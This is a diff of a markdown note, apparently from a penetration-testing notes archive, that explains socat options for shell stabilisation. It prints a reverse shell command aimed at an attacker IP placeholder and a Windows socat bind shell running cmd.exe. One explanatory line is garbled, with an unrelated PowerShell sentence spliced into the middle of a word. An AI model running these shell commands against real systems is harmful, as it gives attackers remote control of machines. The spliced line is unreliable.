7RU7H/Archive/Tools/Shells/Socat.md

 ```bash
 socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
 ```
-1. pty, allocates a pseudoterminal on the target -- part of the stabation, knowing how to properly use PowerShell to achieve our goals is extremely important.
-Refer toilisation process
+1. `pty`, allocates a pseudo-terminal on the target -- part of the stabilisation, knowing how to properly use PowerShell to achieve our goals is extremely important.
+Refer stabilisation process
-1. stderr, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
+1. `stderr`, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)
-1. sigint, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
+1. `sigint`, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
-1. setsid, creates the process in a new session
+1. `setsid`, creates the process in a new session
-1. sane, stabilises the terminal, attempting to "normalise" it
+1. `sane`, stabilises the terminal, attempting to "normalise" it

-Similiarly on Windows:
+Similarly on Windows:
 ```batch
 .\socat.exe TCP-LISTEN:443,fork EXEC:cmd.exe,pty,stderr,setsid,sigint,sane
 ```